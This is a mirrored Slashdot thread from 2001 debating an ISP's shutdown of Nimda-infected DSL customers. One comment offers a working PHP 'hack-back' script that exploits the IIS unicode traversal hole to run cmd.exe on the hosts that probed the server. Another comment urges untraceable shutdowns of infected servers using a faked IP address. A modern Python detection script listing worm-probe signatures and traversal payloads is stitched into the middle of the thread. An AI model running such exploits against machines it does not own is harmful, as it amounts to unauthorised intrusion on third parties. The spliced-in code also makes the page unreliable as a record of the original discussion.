Slashdot Mirror


Shutting Down Worm-Infected Broadband Users

disc-chord writes "Frustrated by Code Red and now Nimda, the DSL provider DSL.net (a CLEC and reseller of Covad) has shut off 800+ infected customers. They claim they cannot get in touch with all of their customers, so they're just shutting them all down, and waiting for the customer to call them. When/if the customer does call they are informed that they are infected with the Nimda virus and must remove it before they will be reactivated. But how are customers supposed to fix the problem when their internet connection is shut down? " I say tough beans: If you get infected, it's your responsibility to get yourself cleaned up. The Internet is a peer-to-peer system where one peer can piss in the public pool. These ISPs are doing a good thing by keeping this crap off the net. Sure, a nicer tactic would be to disable low port numbers for infected users (my provider doesn't let them through in the first place) but this would likely just confuse users. At least this way they know what's up. Flame if you will, but all these worms are going to only get worse since Microsoft will never fix the problem without making sure people have to pay a monthly subscription for their OS, and users are unaware that they have to patch their boxes. ISPs shouldn't have to be responsible for their users this way, but they are responsible for keeping their other users online, and a few infected boxes can cause a lot of havoc for the whole net.

7 of 594 comments

  1. Pay for Fixes? Not paying attention by Anonymous Coward · Score: 1, Informative

    I like the comment that Microsoft doesn't fix these issues without the user paying a subscription, or whatever crap MoronTaco is spewing forth today. For his information, every single exploit Nimda uses has been patched. Some have been patched as long as a year ago. These patches are, and have always been, downloadable for free. Windows Update and Windows Update Critical Updates Service will inform users of these patches when they come out. FUD spewing morons.

  2. my company does the same thing... by uberbastard · Score: 2, Informative

    i work for a major webhosting company, and when the first code-red wave hit our customers' unmanaged servers, we simply assisted them in locating information about patches, provided them with instructions, etc.

    however, most of our customers basically ignored our repeated warnings to patch their servers properly, and when nimda/blue worm hit our network in the past few days, we simply started shutting down servers. we had given them 2+ months, and the patches required to fix these issues had been released by M$ almost a year ago. if shutting our customers down is the only way we can raise awareness about these issues, then so be it. we have tried to help them and they just ignore us.

    i give up.

  3. Re:The stick and carrot by Telek · Score: 3, Informative

    how long has CodeRed been known about now?

    Never mind that; how long have the patches been available and posted prominently on the MS web site, listed under "critical updates"?

    Answer, much longer. IIRC several months prior to CodeRed coming out.

    It doesn't take a lot of work to pop on by to MS every now and then and download any critical/recommended patches. However it's pretty clear that most of these people aren't even aware that they were running a website, much less infected. However you must have had your head under a rock for a while to not have heard about it in the news. Bah, someone just write a proggy that shuts down these servers (one that works) and then go through the DShield database and shut'em all down. You could fake the IP address so it wouldn't be traceable anyways, or at the very least make it a program that you could give to ISPs so that they could run it against their networks to shut down anyone with these servers still running. But I guess that it's just as easy to have them terminate their client's connection. Bah.

    The problem, here, I would think, is that these boxen are probably sitting somewhere on the net not being maintained. I mean any sysadmin, or even any user who circuits the web should have heard about it by now. If they haven't, then they're most likely not really using the web on that connection, in which case cutting them off won't really get their attention (not directly at least) anyways.

    I wonder if there are any statistics on, in the past month, the boxes that have been recognized by their owners and patched. I find it hard to believe that you could account for the (still) 150+ CR hits a day that I get by just "ignorant" people or crappy sysadmins.

    [/ramble]

    --

    If God gave us curiosity

  4. Re:Arbitrary Decisions by Telek · Score: 3, Informative

    I pay for DSL, i can run *WHATEVER* i want on it.

    bull... what company do you go by that doesn't have a hugeass EULA?

    And keep in mind that EULAs and any sort of contract are 98% CYA... They're there with tonnes of clauses that you will violate every day, but they're there so that if you do something stupid, they have a contract saying that you're not allowed to do that. If everyone were to go 100% by their contract, they wouldn't be using the web at all. Yes, this does give them excessive power, but they don't exercise it unless they need to, which is why they still have clients. Same reason why no one reads the EULAs on software; they just click "yeah I agree, let's get on with it". The EULAs are there so if you do something annoying, they can nail you for it.

    NO CONTRACT SHOULD EVER LIMIT FUNDAMENTAL HUMAN RIGHTS

    SO DON'T SIGN IT. It's your choice to sign up for an ISP that has a crazyass EULA. As long as there is competition there will be reasonable TOSs, and when there isn't, that's where the government is supposed to step in to limit what they can do.

    I think that you're going a little haywire though with your freedom thing. Try to redirect some of that energy to what's happening in the aftermath of the attacks, or towards the MPAA or RIAA.

    --

    If God gave us curiosity

  5. My Script to warn infected users by tommyServ0 · Score: 4, Informative

    I made a PHP script, by modifying a similar one used for Code Red. First make a "scripts" directory in your web server's root directory. Now put this into a file called "root.exe"

    <?php
    /* The worm requests /scripts/root.exe from us, so whoever is on the
       other end of this request is an infected IIS box. Open a connection
       back to its own web server on port 80. */
    $remote = $_SERVER['REMOTE_ADDR'];
    $fp = fsockopen($remote, 80, $errno, $errstr, 5);
    /* Check to see if the connection actually opened */
    if ($fp)
    {
        /* URL-encode the message... */
        $string = urlencode("net send %COMPUTERNAME% WARNING: The NIMDA worm has been detected on your computer. Please shut down the IIS web server that is currently running and keep it disabled until you can patch and/or re-install your system, or better yet, upgrade to Linux or FreeBSD. Visit http://www.kb.cert.org/vuls/id/111677 for more information.");
        /* ...and send it through the same unicode directory-traversal hole
           the worm itself uses, so cmd.exe on the infected box runs the
           "net send" and pops the warning up on its console */
        fputs($fp, "GET /msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+$string HTTP/1.0\r\n\r\n");
        /* close the connection (though it probably got closed automatically) */
        fclose($fp);
    }

    /* for fun and confusion: answer the worm with a fake Apache 404 page */
    header("HTTP/1.0 404 Not Found");

    echo "<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n";
    echo "<html><head>\n<title>404 Not Found</title>\n</head><body>\n";
    echo "<h1>Not Found</h1>\n";
    echo "The requested URL " . $_SERVER['SCRIPT_NAME'] . " was not found on this server.\n";
    echo "<address>Apache/1.3.20 Server at " . $_SERVER['SERVER_NAME'] . " Port " . $_SERVER['SERVER_PORT'] . "</address>\n";
    echo "</body></html>\n";

    /* log the offender's address and the time it hit us */
    $res = "dirty\r\n";
    $log = fopen("/tmp/nimda.log", "a");
    fwrite($log, $remote . " " . date("D, d M Y H:i:s T") . " - " . $res);
    fclose($log);
    ?>

    Then, after making sure users can access the file (try going to http://machine/scripts/root.exe), you'll see that it's going to print out the contents of that file. You want to change that, right?

    Well here's how you change that. Edit your httpd.conf file (/etc/httpd.conf, /usr/local/apache/httpd.conf, whatever it is) and add this AddType line:

    AddType application/x-httpd-php .php .php3 .exe

    Now restart Apache by issuing one of either:
    /etc/rc.d/init.d/httpd restart
    apachectl restart

    That should do it, and you're going to have a logfile of all the people who have been warned in /tmp/nimda.log.

    --

    Consider the daffodil. And while you're doing that, I'll be over here, looking through your stuff.

  6. Re:Why? by mjh · Score: 4, Informative

    They care because the traffic generated by infected systems can be costly in both cash value and time. Not to mention the fact that there could be liability issues if they knew of infected systems but did nothing about it.

    Besides, if there are 3 vulnerable systems on a network, and 1 infected system, the responsible thing to do is to protect the 3 remaining uninfected systems.

    I don't believe that is the reason why the provider shutdown their customers. I believe the reason is that they have very specific expectations of bandwidth usage. And they use these expectations to create a nice little equation: for X broadband users we need to have f(X) available bandwidth from our service provider, where f(X) is significantly lower than sum(all user's subscription rates). So while they guarantee you 7x24 access (at whatever rate you paid for) they're only expecting you to be a user 1-2 hours a day, maybe 3-4 days a week. The virii turn your computer bandwidth usage into 7x24 at your subscribed rate. And this really screws up their equation. This is one of the reasons that several broadband providers don't allow you to have servers on your network. The usage patterns of your web server or email server are too unpredictable, and consequently they have to set a policy that forbids them.

    If they don't know about, or stop, the virii, they end up with bad trending data. The trending data is what they use to determine whether or not f(X) was reasonable. When the trending data changes, so does f(X), and they have to spend more money believing that they need more bandwidth. Failure to do this results in customers switching to another provider. This is *especially* true of DSL customers, for whom other providers are nearly guaranteed to exist (since DSL has open access). So, when a provider knows that the trending data is bad, they have one of two choices:

    1. Fix the problem causing the bad trending data - i.e. turn off users who are infected. Hopefully, they will use good identification techniques to determine which users are actually infected. I wouldn't be surprised to see some providers who simply turn off any user who has used more than the expected bandwidth assuming that it must mean that they are infected.
    2. Try and explain to their management why the trending data is bad, and why its conclusions should be ignored. This of course has the added disadvantage that even though the data is bad, customers are still experiencing denial of service.

    I guess I find myself agreeing with Taco, but only to a limited extent. The providers have to make at least some concession to the users who need to be able to download patches. It's easy for us in the *nix world to raise our noses at this. But don't forget that the very first Internet denial of service worm exploited sendmail. We're not immune. We're just not popular. And when the day comes that we are popular, I would like to think that there is a way for me to get the code that will resolve a problem that I didn't know I had.

    --
    Key to financial independence: Spend less than you earn. Save and invest the difference. Do it for a long time.
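Two of the comments above turn on the same question, how a provider tells an infected box from a busy one. Comment 5 uses the worm's own probe (the request for /scripts/root.exe) as the signal that the requesting host is infected; comment 6 warns that a provider might instead just cut off anyone whose bandwidth exceeds expectations. The Python script below is an added example, not code from the thread or from DSL.net: it runs both identification techniques over a few constructed Apache access-log lines and shows why the request-signature approach picks out the infected host while a raw byte threshold flags the wrong customer. The signature list is drawn from the probe paths Code Red and Nimda were known to send; the log lines, IP addresses and byte counts are made up for the example.

```python
"""Identify worm-infected hosts from web-server access logs.

Added example for this thread, not code from the original posts. The log
lines, IP addresses and byte counts are constructed; the signature list is
taken from the probe paths Code Red (/default.ida) and Nimda (root.exe, and
cmd.exe via unicode and double-decode traversal) sent to web servers.
"""
import re
from collections import Counter, defaultdict

# Request-path fragments that only a worm scanner (or a pentester) sends.
# Everything here is lower-case; matching is case-insensitive because IIS is.
WORM_SIGNATURES = (
    "/default.ida",        # Code Red buffer-overflow probe
    "/scripts/root.exe",   # Nimda looking for the cmd.exe copy Code Red II left behind
    "/msadc/root.exe",
    "cmd.exe",             # cmd.exe reached directly via the /c and /d virtual roots
    "%c0%af",              # unicode traversal ("/" as overlong UTF-8)
    "%c1%1c",
    "%255c",               # double-decode traversal ("%5c" encoded twice)
)

# Apache common/combined log format:
#   ip ident user [timestamp] "METHOD path PROTO" status bytes ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) (?P<proto>\S+)" '
    r'(?P<status>\d{3}) (?P<bytes>\d+|-)'
)

# Constructed sample log (not real traffic): 10.0.0.5 behaves like a
# Nimda-infected host, 10.0.0.9 like a legitimate user pulling two CD images,
# and 10.0.0.7 like an ordinary visitor.
SAMPLE_LOG = """\
10.0.0.5 - - [19/Sep/2001:10:01:02 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276 "-" "-"
10.0.0.5 - - [19/Sep/2001:10:01:02 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 276 "-" "-"
10.0.0.5 - - [19/Sep/2001:10:01:03 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 276 "-" "-"
10.0.0.5 - - [19/Sep/2001:10:01:03 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 276 "-" "-"
10.0.0.5 - - [19/Sep/2001:10:01:04 -0400] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 276 "-" "-"
10.0.0.9 - - [19/Sep/2001:10:02:10 -0400] "GET /iso/release.iso HTTP/1.1" 200 650000000 "-" "Mozilla/4.0"
10.0.0.9 - - [19/Sep/2001:10:40:55 -0400] "GET /iso/release2.iso HTTP/1.1" 200 650000000 "-" "Mozilla/4.0"
10.0.0.7 - - [19/Sep/2001:10:03:00 -0400] "GET /index.html HTTP/1.1" 200 4312 "-" "Mozilla/4.0"
"""


def parse_line(line):
    """Return the log fields as a dict, or None if the line is not parseable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["bytes"] = 0 if rec["bytes"] == "-" else int(rec["bytes"])
    return rec


def is_worm_probe(path):
    """True if the request path carries a Code Red / Nimda probe signature."""
    p = path.lower()
    return any(sig in p for sig in WORM_SIGNATURES)


def probe_counts(log_text):
    """Map each source IP to the number of worm-signature requests it sent."""
    counts = Counter()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and is_worm_probe(rec["path"]):
            counts[rec["ip"]] += 1
    return dict(counts)


def infected_hosts(log_text, min_probes=3):
    """Signature-based identification: IPs that sent at least min_probes probes.

    Requiring more than one hit keeps a single curious scan from being
    reported as an infection; a worm fires its whole probe list at once.
    """
    return {ip for ip, n in probe_counts(log_text).items() if n >= min_probes}


def heavy_hosts(log_text, byte_threshold):
    """Naive identification: IPs whose total bytes served exceed the threshold."""
    totals = defaultdict(int)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec:
            totals[rec["ip"]] += rec["bytes"]
    return {ip for ip, b in totals.items() if b > byte_threshold}


if __name__ == "__main__":
    print("worm probes per IP:", probe_counts(SAMPLE_LOG))
    print("infected (by signature):", infected_hosts(SAMPLE_LOG))
    print("heavy (>100 MB served):", heavy_hosts(SAMPLE_LOG, 100 * 1024 * 1024))
```

Run stand-alone, the signature check names only 10.0.0.5, while the byte threshold names only 10.0.0.9, the customer who merely downloaded two large files. The worm's requests are tiny; what makes an infected box expensive for the provider is that it sends them around the clock to every address it can reach, which a per-request signature catches and a byte counter does not.
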

  7. Re:Why? by monkeydo · Score: 2, Informative

    One tiny, preventable worm

    So, why didn't you prevent it? Does your company's business continuity planning not take into account what happens if you can't get to the net? Or is your business so dependent on the Internet that not being able to use it means shutting down? If the former is the case you need to fire whoever is in charge of your network operations, and if the latter is the case you need to, well, fire whoever is in charge of your network operations.

    It appalls me that this sort of thing is allowed to happen and people aren't held responsible. If this worm cost your company that much money, it definitely should have been foreseeable and preventable. This is why users at most companies hate IT: it's because IT at most companies SUCKS. Networks do not have to be unreliable. At the company I work for we have several divisions in one building; one of our divisions was infected and we had to isolate them. The divisions I am responsible for were not affected. It wasn't luck, it's called planning and preparedness.

    --
    Si vis pacem, para bellum
    The only thing more annoying than a Libertarian is an (un|mis)informed Libertarian